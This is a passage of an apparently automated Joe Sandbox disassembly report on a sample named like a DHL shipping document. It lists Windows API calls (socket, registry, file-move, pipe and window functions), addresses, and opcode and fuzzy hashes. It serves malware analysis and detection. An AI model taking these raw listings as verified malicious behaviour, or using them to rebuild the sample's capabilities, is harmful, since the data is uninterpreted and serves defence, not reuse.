                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                            • String ID:
                                                                                            • API String ID: 87235514-0
                                                                                            • Opcode ID: 3eb1507b96529414c1399e24c91211e34d6a62a4e9294eb3570fefbb36c8d55e
                                                                                            • Instruction ID: 05b07c37cfd2792d5a844b7eab6cc3c01a9ebe780868c96b9832421599bbf0d9
                                                                                            • Opcode Fuzzy Hash: 3eb1507b96529414c1399e24c91211e34d6a62a4e9294eb3570fefbb36c8d55e
                                                                                            • Instruction Fuzzy Hash: 5A51E6A15047D53DFB3AA3348C95B7ABF98FB46301F08898AE1D5D68C2D394EC84D752
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(00863CD6,?,?,?,?,?,?,?,?,00855BA3,?,?,00863CD6,?,?), ref: 00855470
                                                                                            • __fassign.LIBCMT ref: 008554EB
                                                                                            • __fassign.LIBCMT ref: 00855506
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00863CD6,00000005,00000000,00000000), ref: 0085552C
                                                                                            • WriteFile.KERNEL32(?,00863CD6,00000000,00855BA3,00000000,?,?,?,?,?,?,?,?,?,00855BA3,?), ref: 0085554B
                                                                                            • WriteFile.KERNEL32(?,?,00000001,00855BA3,00000000,?,?,?,?,?,?,?,?,?,00855BA3,?), ref: 00855584
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: ea3281cf7358ddd138d81f1395427732208d9266b1c19570595f570d55d95759
                                                                                            • Instruction ID: 6ca298bd5d533463a27fc54649d777e122820c1d4112117a16d5abd02b7f5449
                                                                                            • Opcode Fuzzy Hash: ea3281cf7358ddd138d81f1395427732208d9266b1c19570595f570d55d95759
                                                                                            • Instruction Fuzzy Hash: 9551C5B1A006499FDB10CFA8D855AEEBBF9FF09301F14412AF955E7291E7309A45CF60
APIs
• _ValidateLocalCookies.LIBCMT ref: 00842D4B
• ___except_validate_context_record.LIBVCRUNTIME ref: 00842D53
• _ValidateLocalCookies.LIBCMT ref: 00842DE1
• __IsNonwritableInCurrentImage.LIBCMT ref: 00842E0C
• _ValidateLocalCookies.LIBCMT ref: 00842E61
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 30c5373af0678623f616a653d2feb8cbbce01898867aa540199022d884b434e3
• Instruction ID: 05013e509d2958f451040edd51935e417c7f14c5d0034a411409ae6c3dedea75
• Opcode Fuzzy Hash: 30c5373af0678623f616a653d2feb8cbbce01898867aa540199022d884b434e3
• Instruction Fuzzy Hash: C7418A34E0420DABCF10DF68C885A9EBBB5FF45328F548165F815EB292D735AA11CB91
APIs
  • Part of subcall function 008A304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008A307A
  • Part of subcall function 008A304E: _wcslen.LIBCMT ref: 008A309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008A1112
• WSAGetLastError.WSOCK32 ref: 008A1121
• WSAGetLastError.WSOCK32 ref: 008A11C9
• closesocket.WSOCK32(00000000), ref: 008A11F9
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
• Opcode ID: 0b5d15a7776c213845675fe75c8d452615994a076fd4f084461ff678cf79872f
• Instruction ID: c5ce30d9de5b9801f96d61eafe8397f0ff79545ff9c4a1d471be27ba06b6f278
• Opcode Fuzzy Hash: 0b5d15a7776c213845675fe75c8d452615994a076fd4f084461ff678cf79872f
• Instruction Fuzzy Hash: 2541F431600214AFEB109F18D888BA9B7E9FF46364F148159F915DB291DB70ED81CBE1
APIs
  • Part of subcall function 0088DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0088CF22,?), ref: 0088DDFD
  • Part of subcall function 0088DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0088CF22,?), ref: 0088DE16
• lstrcmpiW.KERNEL32(?,?), ref: 0088CF45
• MoveFileW.KERNEL32(?,?), ref: 0088CF7F
• _wcslen.LIBCMT ref: 0088D005
• _wcslen.LIBCMT ref: 0088D01B
• SHFileOperationW.SHELL32(?), ref: 0088D061
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
• Opcode ID: c6763dade7d98b44bde55f6b9143ac37c9cbe684d78a95642374dcaee6c787f8
• Instruction ID: da139ad8e5060606e5f1f321bda636de6c407ace08420bc44674ed64473e7382
• Opcode Fuzzy Hash: c6763dade7d98b44bde55f6b9143ac37c9cbe684d78a95642374dcaee6c787f8
• Instruction Fuzzy Hash: CB4101719452185FDF12FBA4D981ADEB7B9FF08380F1000A6E645EB142EF74AA89CB51
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008B2E1C
• GetWindowLongW.USER32(00000000,000000F0), ref: 008B2E4F
• GetWindowLongW.USER32(00000000,000000F0), ref: 008B2E84
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008B2EB6
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008B2EE0
• GetWindowLongW.USER32(00000000,000000F0), ref: 008B2EF1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008B2F0B
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: a3f2e10f38327cddfa2483adeee65ec5c2c8c2749db15cc9354e0771dd7f5a53
• Instruction ID: e9dd54a426e370712ccbe31904e69219aaa557ea5d14cbc51ce81aaf75feb9eb
• Opcode Fuzzy Hash: a3f2e10f38327cddfa2483adeee65ec5c2c8c2749db15cc9354e0771dd7f5a53
• Instruction Fuzzy Hash: 0B31F030644254AFEB61CF69DC88FA53BA5FBAA710F1501A4F901CB2B2CBB1E840DB51
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00887769
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0088778F
• SysAllocString.OLEAUT32(00000000), ref: 00887792
• SysAllocString.OLEAUT32(?), ref: 008877B0
• SysFreeString.OLEAUT32(?), ref: 008877B9
• StringFromGUID2.OLE32(?,?,00000028), ref: 008877DE
• SysAllocString.OLEAUT32(?), ref: 008877EC
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: a18902b34a5ffd0c5cfffc2090165ef2403a5f29136f48237ff8c8e39c31ac81
• Instruction ID: 9e5ff33bb5dd7b1c98c0b94047b87e22ecc9d2a4904841589ed1c0762110a4c5
• Opcode Fuzzy Hash: a18902b34a5ffd0c5cfffc2090165ef2403a5f29136f48237ff8c8e39c31ac81
• Instruction Fuzzy Hash: 3D219C76608219AFDB10BFA8CC88CBA73ACFF09764B148125BA14DB251D670DD41C7A4
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00887842
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00887868
• SysAllocString.OLEAUT32(00000000), ref: 0088786B
• SysAllocString.OLEAUT32 ref: 0088788C
• SysFreeString.OLEAUT32 ref: 00887895
• StringFromGUID2.OLE32(?,?,00000028), ref: 008878AF
• SysAllocString.OLEAUT32(?), ref: 008878BD
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: d5f82a78918aac89cc2654a466530e02c064a0661feb35d20bbb69817e9e8266
• Instruction ID: c9b4c0d7ae8bdda4d9c0b1b9553229eabddd456e3f640a976b066dc98cfc948a
• Opcode Fuzzy Hash: d5f82a78918aac89cc2654a466530e02c064a0661feb35d20bbb69817e9e8266
• Instruction Fuzzy Hash: 38217431608108AFDB10AFA8DC88DAA77FCFB497607208135F915CB2A1DA70DD41CB78
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 008904F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0089052E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: e354eab677d06e378f09dd9fbc0564fc8a12d44352c2c19d3a24ccf565dd7252
• Instruction ID: 7ea7601bae8db50d64e8a15ae51a74b34b94ca9246eaa9256720b226936851d4
• Opcode Fuzzy Hash: e354eab677d06e378f09dd9fbc0564fc8a12d44352c2c19d3a24ccf565dd7252
• Instruction Fuzzy Hash: 9B216D75500305AFDF20AF69DC44A9A77B8FF44764F654A29F8A1E62E0D7709940CF20
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 008905C6
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00890601
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: a229d6cb33cf9de0653b963c500b03c47de6f43606c2224c1750ccf9bdb9c443
• Instruction ID: 9bb2b30ba2dabd958bfe864b8887c2b1c14cd02c17e880a6020e55f0133af672
• Opcode Fuzzy Hash: a229d6cb33cf9de0653b963c500b03c47de6f43606c2224c1750ccf9bdb9c443
• Instruction Fuzzy Hash: 7D2151755003059FDF21AF699C04A9A77E8FFA5724F240B19F8A1E72E0D7709960CF20
                                                                                            APIs
                                                                                              • Part of subcall function 0082600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0082604C
                                                                                              • Part of subcall function 0082600E: GetStockObject.GDI32(00000011), ref: 00826060
                                                                                              • Part of subcall function 0082600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0082606A
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008B4112
                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008B411F
                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008B412A
                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008B4139
                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008B4145
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                            • String ID: Msctls_Progress32
                                                                                            • API String ID: 1025951953-3636473452
                                                                                            • Opcode ID: 67a06b6b8977975554608ab7439cb3333ef34e216fd607255eda5a6ca48451f5
                                                                                            • Instruction ID: 952cb7745f472d7e136d448c5091c4cc58fe5c279b73d4cec6ecf35248bc3162
                                                                                            • Opcode Fuzzy Hash: 67a06b6b8977975554608ab7439cb3333ef34e216fd607255eda5a6ca48451f5
                                                                                            • Instruction Fuzzy Hash: C71190B215021DBEEF119E68CC86EE77F9DFF19798F004111BA18E2150C6729C61DBA4
                                                                                            APIs
                                                                                              • Part of subcall function 0085D7A3: _free.LIBCMT ref: 0085D7CC
                                                                                            • _free.LIBCMT ref: 0085D82D
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 0085D838
                                                                                            • _free.LIBCMT ref: 0085D843
                                                                                            • _free.LIBCMT ref: 0085D897
                                                                                            • _free.LIBCMT ref: 0085D8A2
                                                                                            • _free.LIBCMT ref: 0085D8AD
                                                                                            • _free.LIBCMT ref: 0085D8B8
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                            • Instruction ID: 054db6233d99eb8f1647700af4086d67aded4711d33133fc6d2e4356e3c61c67
                                                                                            • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                            • Instruction Fuzzy Hash: 1D115E71540B04AAD631BFB4CC47FCB7FDCFF09702F400825BE99E6992DA65B5098662
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0088DA74
                                                                                            • LoadStringW.USER32(00000000), ref: 0088DA7B
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0088DA91
                                                                                            • LoadStringW.USER32(00000000), ref: 0088DA98
                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0088DADC
                                                                                            Strings
                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0088DAB9
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                            • API String ID: 4072794657-3128320259
                                                                                            • Opcode ID: f10742a4176b448957fd040c09727578ddc549ccdf18b4f1c30a5b570b368c2e
                                                                                            • Instruction ID: 9c8aaf8a9f7c61de01b4df8fd56186fc2d1482be967c216aca263f407c3c2b4d
                                                                                            • Opcode Fuzzy Hash: f10742a4176b448957fd040c09727578ddc549ccdf18b4f1c30a5b570b368c2e
                                                                                            • Instruction Fuzzy Hash: B2016DF29002187FE711ABE49D89EEB376CFB08305F400596B746E2081EA749E848F74
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(00B309D0,00B309D0), ref: 0089097B
                                                                                            • EnterCriticalSection.KERNEL32(00B309B0,00000000), ref: 0089098D
                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 0089099B
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008909A9
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008909B8
                                                                                            • InterlockedExchange.KERNEL32(00B309D0,000001F6), ref: 008909C8
                                                                                            • LeaveCriticalSection.KERNEL32(00B309B0), ref: 008909CF
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 3495660284-0
                                                                                            • Opcode ID: f2e7bcd1f56bc3becf0efaca2fb627b24ae6bc6f8c42f2ca9c6ef4d34404bbe1
                                                                                            • Instruction ID: 1c94ef795818474013df098cb305bdd8854658ddf97e3fb21030300c42ec5d87
                                                                                            • Opcode Fuzzy Hash: f2e7bcd1f56bc3becf0efaca2fb627b24ae6bc6f8c42f2ca9c6ef4d34404bbe1
                                                                                            • Instruction Fuzzy Hash: 0CF0EC32442A12BFDB555FA4EE8DBD6BB39FF05702F442226F202908A1C7759865CF90
                                                                                            APIs
                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 008A1DC0
                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008A1DE1
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1DF2
                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 008A1EDB
                                                                                            • inet_ntoa.WSOCK32(?), ref: 008A1E8C
                                                                                              • Part of subcall function 008839E8: _strlen.LIBCMT ref: 008839F2
                                                                                              • Part of subcall function 008A3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0089EC0C), ref: 008A3240
                                                                                            • _strlen.LIBCMT ref: 008A1F35
                                                                                            Similarity
                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                            • String ID:
                                                                                            • API String ID: 3203458085-0
                                                                                            • Opcode ID: 0bd415307cc0e4d2ea9fed00bad9a0a3326fbd1ca3d06d7643b071a0994233bf
                                                                                            • Instruction ID: 342439b03635bab067f64646bf7fa6ce8016b732e4f24e3574b4a8d441e92705
                                                                                            • Opcode Fuzzy Hash: 0bd415307cc0e4d2ea9fed00bad9a0a3326fbd1ca3d06d7643b071a0994233bf
                                                                                            • Instruction Fuzzy Hash: 83B1EF30204340AFE724DF28C889E2A7BA5FF85318F54855CF4569F6A2DB71ED81CB92
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 00825D30
                                                                                            • GetWindowRect.USER32(?,?), ref: 00825D71
                                                                                            • ScreenToClient.USER32(?,?), ref: 00825D99
                                                                                            • GetClientRect.USER32(?,?), ref: 00825ED7
                                                                                            • GetWindowRect.USER32(?,?), ref: 00825EF8
                                                                                            Similarity
                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                            • String ID:
                                                                                            • API String ID: 1296646539-0
                                                                                            • Opcode ID: 7aa54d5cb6debe4e36a82d3214b51049304c03b258240e03d3ef63eb77b27b60
                                                                                            • Instruction ID: b371651fed4ab9e4d4ab25ed3d540a04a744f588d6d0095deb06d4758d151c11
                                                                                            • Opcode Fuzzy Hash: 7aa54d5cb6debe4e36a82d3214b51049304c03b258240e03d3ef63eb77b27b60
                                                                                            • Instruction Fuzzy Hash: 07B17938A0074ADBDB14CFA8C4807EEB7F1FF58310F15951AE8A9D7250DB30AA91DB50
                                                                                            APIs
                                                                                            • __allrem.LIBCMT ref: 008500BA
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008500D6
                                                                                            • __allrem.LIBCMT ref: 008500ED
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0085010B
                                                                                            • __allrem.LIBCMT ref: 00850122
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00850140
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1992179935-0
                                                                                            • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                            • Instruction ID: 87be0afb0d0f8ddc878732bd9dff421bd0098ad9fe155c1300ee7926b07593b3
                                                                                            • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                            • Instruction Fuzzy Hash: C681E772A00B0A9BE7209F6CCC41B6A73E9FF51365F24413EF951D6682EF70D9088B52
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008482D9,008482D9,?,?,?,0085644F,00000001,00000001,8BE85006), ref: 00856258
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0085644F,00000001,00000001,8BE85006,?,?,?), ref: 008562DE
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008563D8
                                                                                            • __freea.LIBCMT ref: 008563E5
                                                                                              • Part of subcall function 00853820: RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            • __freea.LIBCMT ref: 008563EE
                                                                                            • __freea.LIBCMT ref: 00856413
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1414292761-0
                                                                                            • Opcode ID: b218fbf1546f4de9f413552c7e4dc9299adef6904fe52c4e365575f7b447b8d3
                                                                                            • Instruction ID: 32f1586825b6b3b1fcfa8a6f94809f0ad4f1ddc67f8066294743e4138ec22902
                                                                                            • Opcode Fuzzy Hash: b218fbf1546f4de9f413552c7e4dc9299adef6904fe52c4e365575f7b447b8d3
                                                                                            • Instruction Fuzzy Hash: 9751C072A00216ABEF258F68CC81EEF7BA9FB44752F554629FC05D7240EB34DC68C661
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 008AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008AB6AE,?,?), ref: 008AC9B5
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008AC9F1
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA68
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA9E
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008ABCCA
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008ABD25
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008ABD6A
                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008ABD99
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008ABDF3
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008ABDFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
